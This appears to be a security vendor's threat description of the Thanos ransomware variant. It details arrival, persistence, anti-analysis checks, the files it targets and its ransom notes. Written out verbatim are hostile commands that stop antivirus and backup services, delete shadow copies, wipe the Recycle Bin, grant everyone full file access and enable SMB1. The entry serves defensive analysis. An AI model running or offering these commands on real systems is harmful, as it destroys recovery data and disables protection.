Ransom.MSIL.THANOS.FAIM

This Ransomware arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

It executes then deletes itself afterward.

It deletes registry keys related to antivirus programs. Doing this allows this malware to execute its routines without being detected by installed antivirus programs.

It encrypts files with specific file extensions. It drops files as ransom note. It avoids encrypting files with the following file extensions.

Arrival Details

This Ransomware arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Installation

This Ransomware drops the following files:

• %System%\UserName={Username}_MachineName={Machine Name}_{Volume Serial Number}.txt -> contains the machine's IP, the date of encryption and unique identifier key
• %User Startup%\mystartup.lnk -> points to the created ransom note

(Note: %System% is the Windows system folder, where it usually is C:\Windows\System32 on all Windows operating system versions.. %User Startup% is the current user's Startup folder, which is usually C:\Windows\Profiles\{user name}\Start Menu\Programs\Startup on Windows 98 and ME, C:\WINNT\Profiles\{user name}\Start Menu\Programs\Startup on Windows NT, C:\Documents and Settings\{User name}\Start Menu\Programs\Startup on Windows 2003(32-bit), XP and 2000(32-bit), or C:\Users\{user name}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup on Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit), 10(64-bit).)

It adds the following processes:

• "taskkill" /F /IM RaccineSettings.exe
• "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
• "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
• "reg" delete HKCU\Software\Raccine /F
• "schtasks" /DELETE /TN "Raccine Rules Updater" /F
• "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
• "cmd.exe" /c rd /s /q D:\$Recycle.bin
• "%System%\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "{Malware Path}\{Malware Filename}.exe
• "sc.exe" config Dnscache start= auto;
• "sc.exe" config FDResPub start= auto;
• "sc.exe" config SSDPSRV start= auto;
• "sc.exe" config upnphost start= auto;
• "sc.exe" config SQLTELEMETRY start= disabled;
• "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled;
• "sc.exe" config SQLWriter start= disabled;
• "sc.exe" config SstpSvc start= disabled;
• "net.exe" start Dnscache /y;
• "net.exe" start FDResPub /y;
• "net.exe" start SSDPSRV /y;
• "net.exe" start upnphost /y;
• "net.exe" stop avpsus /y;
• "net.exe" stop McAfeeDLPAgentService /y;
• "net.exe" stop mfewc /y;
• "net.exe" stop BMR Boot Service /y;
• "net.exe" stop NetBackup BMR MTFTP Service /y;
• "net.exe" stop DefWatch /y;
• "net.exe" stop ccEvtMgr /y;
• "net.exe" stop ccSetMgr /y;
• "net.exe" stop SavRoam /y;
• "net.exe" stop RTVscan /y;
• "net.exe" stop QBFCService /y;
• "net.exe" stop QBIDPService /y;
• "net.exe" stop Intuit.QuickBooks.FCS /y;
• "net.exe" stop QBCFMonitorService /y;
• "net.exe" stop YooBackup /y;
• "net.exe" stop YooIT /y;
• "net.exe" stop zhudongfangyu /y;
• "net.exe" stop stc_raw_agent /y;
• "net.exe" stop VSNAPVSS /y;
• "net.exe" stop VeeamTransportSvc /y;
• "net.exe" stop VeeamDeploymentService /y;
• "net.exe" stop VeeamNFSSvc /y;
• "net.exe" stop veeam /y;
• "net.exe" stop PDVFSService /y;
• "net.exe" stop BackupExecVSSProvider /y;
• "net.exe" stop BackupExecAgentAccelerator /y;
• "net.exe" stop BackupExecAgentBrowser /y;
• "net.exe" stop bedbg /y;
• "net.exe" stop MSSQL$SQL_2008 /y;
• "net.exe" stop EhttpSrv /y;
• "net.exe" stop MMS /y;
• "net.exe" stop MSSQL$SQLEXPRESS /y;
• "net.exe" stop ekrn /y;
• "net.exe" stop mozyprobackup /y;
• "net.exe" stop BackupExecDiveciMediaService /y;
• "net.exe" stop “SQL Backups /y;
• "net.exe" stop MSSQL$SYSTEM_BGC /y;
• "net.exe" stop EPSecurityService /y;
• "net.exe" stop MSSQL$VEEAMSQL2008R2 /y;
• "net.exe" stop MSSQL$TPS /y;
• "net.exe" stop EPUpdateService /y;
• "net.exe" stop ntrtscan /y;
• "net.exe" stop MSSQL$TPSAMA /y;
• "net.exe" stop EsgShKernel /y;
• "net.exe" stop PDVFSService /y;
• "net.exe" stop MSSQL$VEEAMSQL2008R2 /y;
• "net.exe" stop ESHASRV /y;
• "net.exe" stop SDRSVC /y;
• "net.exe" stop MSSQL$VEEAMSQL2012 /y;
• "net.exe" stop FA_Scheduler /y;
• "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y;
• "net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y;
• "net.exe" stop KAVFS /y;
• "net.exe" stop BackupExecJobEngine /y;
• "net.exe" stop MsDtsServer100 /y;
• "net.exe" stop NetMsmqActivator /y;
• "net.exe" stop MSExchangeIS /y;
• "net.exe" stop “Sophos AutoUpdate Service” /y;
• "net.exe" stop SamSs /y;
• "net.exe" stop ReportServer /y;
• "net.exe" stop “SQLsafe Backup Service” /y;
• "net.exe" stop MsDtsServer110 /y;
• "net.exe" stop POP3Svc /y;
• "net.exe" stop MSExchangeMGMT /y;
• "net.exe" stop “Sophos Clean Service” /y;
• "net.exe" stop SMTPSvc /y;
• "net.exe" stop ReportServer$SQL_2008 /y;
• "net.exe" stop “SQLsafe Filter Service” /y;
• "net.exe" stop SQLWriter /y;
• "net.exe" stop BackupExecManagementService /y;
• "net.exe" stop BackupExecRPCService /y;
• "net.exe" stop AcrSch2Svc /y;
• "net.exe" stop AcronisAgent /y;
• "net.exe" stop msftesql$PROD /y;
• "net.exe" stop SstpSvc /y;
• "net.exe" stop MSExchangeMTA /y;
• "net.exe" stop “Sophos Device Control Service” /y;
• "net.exe" stop ReportServer$SYSTEM_BGC /y;
• "net.exe" stop “Symantec System Recovery” /y;
• "net.exe" stop MSOLAP$SQL_2008 /y;
• "net.exe" stop UI0Detect /y;
• "net.exe" stop MSExchangeSA /y;
• "net.exe" stop “Sophos File Scanner Service” /y;
• "net.exe" stop ReportServer$TPS /y;
• "net.exe" stop “Veeam Backup Catalog Data Service” /y;
• "net.exe" stop MSSQLFDLauncher$SBSMONITORING /y;
• "net.exe" stop CASAD2DWebSvc /y;
• "net.exe" stop MSOLAP$SYSTEM_BGC /y;
• "net.exe" stop KAVFSGT /y;
• "net.exe" stop CAARCUpdateSvc /y;
• "net.exe" stop W3Svc /y;
• "net.exe" stop VeeamBackupSvc /y;
• "net.exe" stop sophos /y;
• "net.exe" stop MSExchangeSRS /y;
• "net.exe" stop MSSQLFDLauncher$SHAREPOINT /y;
• "net.exe" stop kavfsslp /y;
• "net.exe" stop VeeamBrokerSvc /y;
• "net.exe" stop MSSQLFDLauncher$SQL_2008 /y;
• "net.exe" stop klnagent /y;
• "net.exe" stop VeeamCatalogSvc /y;
• "net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y;
• "net.exe" stop macmnsvc /y;
• "net.exe" stop VeeamCloudSvc /y;
• "net.exe" stop MSSQLFDLauncher$TPS /y;
• "net.exe" stop masvc /y;
• "net.exe" stop VeeamDeploymentService /y;
• "net.exe" stop MSSQLFDLauncher$TPSAMA /y;
• "net.exe" stop MBAMService /y;
• "net.exe" stop VeeamDeploySvc /y;
• "net.exe" stop MSSQLSERVER /y;
• "net.exe" stop MBEndpointAgent /y;
• "net.exe" stop VeeamEnterpriseManagerSvc /y;
• "net.exe" stop MSSQLServerADHelper /y;
• "net.exe" stop McAfeeEngineService /y;
• "net.exe" stop VeeamHvIntegrationSvc /y;
• "net.exe" stop MSSQLServerADHelper100 /y;
• "net.exe" stop McAfeeFramework /y;
• "net.exe" stop VeeamMountSvc /y;
• "net.exe" stop MSSQLServerOLAPService /y;
• "net.exe" stop McAfeeFrameworkMcAfeeFramework /y;
• "net.exe" stop VeeamNFSSvc /y;
• "net.exe" stop MySQL57 /y;
• "net.exe" stop McShield /y;
• "net.exe" stop VeeamRESTSvc /y;
• "net.exe" stop MySQL80 /y;
• "net.exe" stop McTaskManager /y;
• "net.exe" stop “Acronis VSS Provider” /y;
• "net.exe" stop “Sophos Health Service” /y;
• "net.exe" stop VeeamTransportSvc /y;
• "net.exe" stop MsDtsServer /y;
• "net.exe" stop ReportServer$TPSAMA /y;
• "net.exe" stop OracleClientCache80 /y;
• "net.exe" stop IISAdmin /y;
• "net.exe" stop “Zoolz 2 Service” /y;
• "net.exe" stop mfefire /y;
• "net.exe" stop MSExchangeES /y;
• "net.exe" stop MSOLAP$TPS /y;
• "net.exe" stop wbengine /y;
• "net.exe" stop “Sophos Agent” /y;
• "net.exe" stop “aphidmonitorservice” /y;
• "net.exe" stop ReportServer$SQL_2008 /y;
• ;"net.exe" stop EraserSvc11710 /y;
• "net.exe" stop msexchangeadtopology /y;
• "net.exe" stop mfemms /y;
• "net.exe" stop “Enterprise Client Service” /y;
• "net.exe" stop “Sophos MCS Agent” /y;
• "net.exe" stop wbengine /y;
• "net.exe" stop SepMasterService /y;
• "net.exe" stop MSSQL$ECWDB2 /y;
• "net.exe" stop AcrSch2Svc /y;
• "net.exe" stop MSOLAP$TPSAMA /y;
• "net.exe" stop RESvc /y;
• "net.exe" stop SQLAgent$PRACTTICEMGT /y;
• "net.exe" stop audioendpointbuilder /y;
• "net.exe" stop “intel(r) proset monitoring service” /y;
• "net.exe" stop mfevtp /y;
• "net.exe" stop sms_site_sql_backup /y;
• "net.exe" stop SQLAgent$BKUPEXEC /y;
• "net.exe" stop MSSQL$SOPHOS /y;
• "net.exe" stop SQLAgent$CITRIX_METAFRAME /y;
• "net.exe" stop sacsvr /y;
• "net.exe" stop SQLAgent$CXDB /y;
• "net.exe" stop SAVAdminService /y;
• "net.exe" stop SQLAgent$ECWDB2 /y;
• "net.exe" stop SAVService /y;
• "net.exe" stop SQLAgent$PRACTTICEBGC /y;
• "net.exe" stop SQLAgent$PROD /y;
• "net.exe" stop Smcinst /y;
• "net.exe" stop SQLAgent$PROFXENGAGEMENT /y;
• "net.exe" stop SmcService /y;
• "net.exe" stop SQLAgent$SBSMONITORING /y;
• "net.exe" stop SntpService /y;
• "net.exe" stop ShMonitor /y;
• "net.exe" stop “Sophos Safestore Service” /y;
• "net.exe" stop msexchangeimap4 /y;
• "net.exe" stop SQLAgent$SHAREPOINT /y;
• "net.exe" stop SQLAgent$TPSAMA /y;
• "net.exe" stop BackupExecAgentBrowser /y;
• "net.exe" stop “Sophos MCS Client” /y;
• "net.exe" stop sophossps /y;
• "net.exe" stop swi_update /y;
• "net.exe" stop MSSQL$PRACTICEMGT /y;
• "net.exe" stop ARSM /y;
• "net.exe" stop SQLAgent$SQL_2008 /y;
• "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y;
• "net.exe" stop “Sophos System Protection Service” /y;
• "net.exe" stop MSSQL$BKUPEXEC /y;
• "net.exe" stop SQLAgent$SOPHOS /y;
• "net.exe" stop swi_update_64 /y;
• "net.exe" stop BackupExecDeviceMediaService /y;
• "net.exe" stop unistoresvc_1af40a /y;
• "net.exe" stop SQLAgent$SQLEXPRESS /y;
• "net.exe" stop SQLAgent$VEEAMSQL2012 /y;
• "net.exe" stop MSSQL$PRACTTICEBGC /y;
• "net.exe" stop “Sophos Message Router” /y;
• "net.exe" stop BackupExecAgentAccelerator /y;
• "net.exe" stop MSSQL$SBSMONITORING /;
• "net.exe" stop MSSQL$SBSMONITORING /y;
• "net.exe" stop AVP /y;
• "net.exe" stop BackupExecVSSProvider /y;
• "net.exe" stop MSSQL$SHAREPOINT /y;
• "net.exe" stop DCAgent /y;
• "net.exe" stop SQLTELEMETRY /y;
• "net.exe" stop TrueKeyServiceHelper /y;
• "net.exe" stop svcGenericHost /y;
• "net.exe" stop TmCCSF /y;
• "net.exe" stop “Sophos Web Control Service” /y;
• "net.exe" stop SQLTELEMETRY$ECWDB2 /y;
• "net.exe" stop SQLAgent$SYSTEM_BGC /y;
• "net.exe" stop SQLBrowser /y;
• "net.exe" stop BackupExecJobEngine /y;
• "net.exe" stop MSSQL$PROD /y;
• "net.exe" stop AcronisAgent /y;
• "net.exe" stop BackupExecManagementService /y;
• "net.exe" stop MSSQL$PROFXENGAGEMENT /y;
• "net.exe" stop Antivirus /y;
• "net.exe" stop BackupExecRPCService /y;
• "net.exe" stop WRSVC /y;
• "net.exe" stop swi_filter /y;
• "net.exe" stop tmlisten /y;
• "net.exe" stop mssql$vim_sqlexp /y;
• "net.exe" stop SQLAgent$TPS /y;
• "net.exe" stop swi_service /y;
• "net.exe" stop SQLSafeOLRService /y;
• "net.exe" stop vapiendpoint /y;
• "net.exe" stop TrueKey /y;
• "net.exe" stop SQLSERVERAGENT /y;
• "net.exe" stop TrueKeyScheduler /y;
• "taskkill.exe" /IM mspub.exe /F;
• "taskkill.exe" /IM synctime.exe /F;
• "taskkill.exe" /IM mydesktopqos.exe /F;
• "taskkill.exe" /IM mydesktopservice.exe /F;
• "taskkill.exe" /IM Ntrtscan.exe /F;
• "taskkill.exe" /IM sqbcoreservice.exe /F;
• "taskkill.exe" /IM mysqld.exe /F;
• "taskkill.exe" /IM isqlplussvc.exe /F;
• "taskkill.exe" /IM firefoxconfig.exe /F;
• "taskkill.exe" /IM excel.exe /F;
• "taskkill.exe" /IM CNTAoSMgr.exe /F;
• "taskkill.exe" /IM sqlwriter.exe /F;
• "taskkill.exe" /IM tbirdconfig.exe /F;
• "taskkill.exe" /IM agntsvc.exe /F;
• "taskkill.exe" /IM onenote.exe /F;
• "taskkill.exe" /IM PccNTMon.exe /F;
• "taskkill.exe" /IM msaccess.exe /F;
• "taskkill.exe" /IM outlook.exe /F;
• "taskkill.exe" /IM tmlisten.exe /F;
• "taskkill.exe" /IM msftesql.exe /F;
• "taskkill.exe" /IM powerpnt.exe /F;
• "taskkill.exe" /IM mydesktopqos.exe /F;
• "taskkill.exe" /IM visio.exe /F;
• "taskkill.exe" /IM mydesktopservice.exe /F;
• "taskkill.exe" /IM winword.exe /F;
• "taskkill.exe" /IM mysqld-nt.exe /F;
• "taskkill.exe" /IM wordpad.exe /F;
• "taskkill.exe" /IM dbeng50.exe /F;
• "taskkill.exe" /IM thebat.exe /F;
• "taskkill.exe" /IM steam.exe /F;
• "taskkill.exe" /IM encsvc.exe /F;
• "taskkill.exe" /IM mysqld-opt.exe /F;
• "taskkill.exe" /IM thebat64.exe /F;
• "taskkill.exe" /IM xfssvccon.exe /F;
• "taskkill.exe" /IM ocautoupds.exe /F;
• "taskkill.exe" /IM ocomm.exe /F;
• "taskkill.exe" /IM ocssd.exe /F;
• "taskkill.exe" /IM infopath.exe /F;
• "taskkill.exe" /IM mbamtray.exe /F;
• "taskkill.exe" /IM zoolz.exe /F;
• "taskkill.exe" /IM oracle.exe /F;
• "taskkill.exe" IM thunderbird.exe /F;
• "taskkill.exe" /IM dbsnmp.exe /F;
• "taskkill.exe" /IM sqlagent.exe /F;
• "taskkill.exe" /IM sqlbrowser.exe /F;
• "taskkill.exe" /IM sqlservr.exe /F;
• "icacls" "C:*" /grant Everyone:F /T /C /Q
• "icacls" "D:*" /grant Everyone:F /T /C /Q
• "icacls" "Z:*" /grant Everyone:F /T /C /Q
• "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
• "cmd.exe" /c net view
• "%System%\mshta.exe" %Desktop%\RESTORE_FILES_INFO.hta

(Note: %System% is the Windows system folder, where it usually is C:\Windows\System32 on all Windows operating system versions.. %Desktop% is the current user's desktop, which is usually C:\Documents and Settings\{User Name}\Desktop on Windows 2000(32-bit), XP, and Server 2003(32-bit), or C:\Users\{user name}\Desktop on Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) and 10(64-bit).)

It executes then deletes itself afterward.

It adds the following mutexes to ensure that only one of its copies runs at any one time:

• af1565f9-32ee-4d2e-bd3d-c27df873f7e2

It terminates itself if it finds the following processes in the affected system's memory:

• CFF Explorer
• de4dot
• dnspy
• dnspy-x86
• dotpeek
• dotpeek64
• dumpcap
• effetech http sniffer
• fiddler
• firesheep
• http analyzer stand-alone
• HTTPNetworkSniffer
• ida64
• IEWatch Professional
• ilspy
• intercepter
• Intercepter-NG
• LordPE
• MegaDumper
• NetworkMiner
• NetworkTrafficView
• NoFuserEx
• ollydbg
• PEiD
• pe-sieve
• procexp
• procexp64
• protection_id
• RDG Packer Detector
• sysinternals tcpview
• tcpdump
• UnConfuserEx
• Universal_Fixer
• wireshark
• wireshark portable
• x32dbg
• x64dbg

Other System Modifications

This Ransomware modifies the following registry entries:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows\CurrentVersion\Policies\
System
LocalAccountTokenFilterPolicy = 1

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows\CurrentVersion\Policies\
System
EnableLinkedConnections = 1

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\
Control\FileSystem
LongPathsEnabled = 1

It deletes the following registry keys related to antivirus and security applications:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
Services\EventLog\Application
Raccine =

HKEY_LOCAL_MACHINE\SOFTWARE
Raccine =

HKEY_CURRENT_USER\SOFTWARE
Raccine =

Other Details

This Ransomware does the following:

• This ransomware requires to be executed with admin rights to proceed with its intended routine
• It affects all existing drives of the affected machine
• It empties out the Recycle Bin
• This ransomware deletes the following subkeys from under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options:
  • vssadmin.exe
  • wmic.exe
  • wbadmin.exe
  • bcdedit.exe
  • powershell.exe
  • diskshadow.exe
  • net.exe
• Kills processes with large private memory space if their process name is not one of the following:
  • {Malware name}
  • chrome
  • opera
  • msedge
  • iexplore
  • firefox
  • explorer
  • winint
  • winlogon

It executes the following commands to gain access to the network configuration settings of the system:

• "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
• "netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
• "powershell.exe" & Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
• "arp" -a
• "net.exe" use \{IP Address}
• "net.exe" use \{Subnet Mask}
• "net.exe" use \{Default Gateway}

Ransomware Routine

This Ransomware encrypts files with the following extensions:

• 7z
• accdb
• aes
• aiff
• asm
• avi
• backup
• bak
• bz2
• cert
• class
• cpp
• cpp
• cs
• csr
• csv
• dat
• dbf
• dim
• djvu
• doc
• docm
• docx
• dtsx
• dwg
• edb
• eml
• flac
• gif
• gpg
• htm
• html
• hwp
• java
• java
• jpeg
• jpg
• key
• lay6
• ldf
• lgb
• m4a
• mdb
• mdf
• mkv
• mov
• mp3
• mp4
• mpeg
• mrimg
• msg
• myd
• nd
• ndf
• nef
• odb
• odg
• ods
• odt
• ora
• ost
• p12
• pas
• pdf
• pem
• pfx
• php
• php
• png
• ppt
• pptx
• psd
• pst
• qbb
• qbw
• rar
• raw
• rdl
• rtf
• sql
• sql
• sqlite3
• sqlitedb
• svg
• sxi
• sxw
• tar
• tiff
• tlg
• txt
• vdi
• vmdk
• vmx
• vsd
• wav
• xdw
• xls
• xlsm
• xlsx
• zip

It avoids encrypting files with the following strings in their file name:

• autoexec.bat
• desktop.ini
• autorun.inf
• ntuser.dat
• iconcache.db
• bootsect.bak
• boot.ini
• ntuser.dat.log
• thumbs.db
• bootmgr
• pagefile.sys
• config.sys
• ntuser.ini
• Builder_Log
• RSAKeys
• Recycle Bin
• RESTORE_FILES_INFO
• UserName={Username}_MachineName={Machine Name}_{Volume Serial Number}.txt

It avoids encrypting files with the following strings in their file path:

• Program Files
• Windows
• Perflogs
• Internet Explorer
• ProgramData
• AppData

It appends the following extension to the file name of the encrypted files:

• {Original Filename}.{Original Extension}.zuadr

It drops the following file(s) as ransom note:

• %User Temp%\RESTORE_FILES_INFO.txt
• {Encrypted Directory}\RESTORE_FILES_INFO.txt
• %Desktop%\RESTORE_FILES_INFO.txt
  
• %Desktop%\RESTORE_FILES_INFO.hta
  

It avoids encrypting files with the following file extensions:

• .exe
• .dll
• .EXE
• .DLL
• .zuadr